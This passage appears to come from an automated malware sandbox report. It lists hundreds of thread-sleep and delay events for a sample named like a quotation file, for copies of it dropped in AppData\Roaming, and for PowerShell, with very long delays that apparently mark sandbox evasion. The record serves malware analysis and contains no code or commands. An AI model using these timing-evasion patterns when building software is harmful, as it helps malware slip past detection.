                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596260
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596142
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595905
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595791
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595679
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595575
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595358
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599654
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599327
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598994
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598668
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598339
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597797
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597687
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597578
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597359
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597031
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596915
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596703
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596265
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596156
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596046
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595934
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595828
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595718
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595609
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595500
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595390
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595281
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595171
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595062
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594953
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594839
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594734
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594625
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7917Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1660Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7848Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1809Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWindow / User API: threadDelayed 3835Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWindow / User API: threadDelayed 6006Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeWindow / User API: threadDelayed 2702
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeWindow / User API: threadDelayed 7150
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 5038
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 3268
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 2671
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 7188
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 6800Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6416Thread sleep count: 7917 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1004Thread sleep count: 1660 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -598999s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -598889s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -598672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -598561s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -598451s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -598343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -598124s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -598002s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -597789s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -597683s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -597553s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -597422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -597308s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -597187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -597078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -596968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -596859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -596750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -596640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -596531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -596417s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -596297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -596187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -596078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -595968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -595859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -595749s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -595639s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -595531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -595410s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -595279s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -595169s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -594864s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -594585s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -594468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -594359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -594244s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -594125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe TID: 7372Thread sleep time: -594015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7280Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -599859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -599750s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -599640s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -599531s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -599421s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -599312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -599203s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -599093s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -598984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -598874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -598726s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -598609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -598499s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -598390s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -598281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -598171s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -598059s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -597953s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -597843s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -597317s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -597165s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -597049s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -596921s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -596812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -596697s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -596574s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -596468s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -596302s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -596171s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -596062s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -595949s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -595843s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -595734s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -595624s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -595515s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -595406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -595268s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -595146s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -594450s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -594343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -594234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -594125s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -594015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -593906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -593794s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -593687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -593578s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -593464s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe TID: 7728Thread sleep time: -593310s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7872Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -24903104499507879s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7148Thread sleep count: 5038 > 30
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -599890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7148Thread sleep count: 3268 > 30
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -599768s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -599640s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -599454s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -599328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -599217s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -599109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -599000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -598890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -598781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -598671s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -598562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -598453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -598343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -598234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -598125s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -598015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -597906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -597796s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -597687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -597578s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -597468s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -597359s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -597250s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -597140s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -597031s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -596921s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -596812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -596703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -596593s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -596484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -596375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -596260s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -596142s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -596015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -595905s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -595791s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -595679s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -595575s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -595468s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7100Thread sleep time: -595358s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 352Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -26747778906878833s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -599765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -599654s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -599547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -599437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -599327s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -599218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -599109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -598994s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -598890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -598781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -598668s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -598562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -598453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -598339s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -598234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -598125s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -598015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -597906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -597797s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -597687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -597578s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -597468s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -597359s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -597250s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -597140s >= -30000s
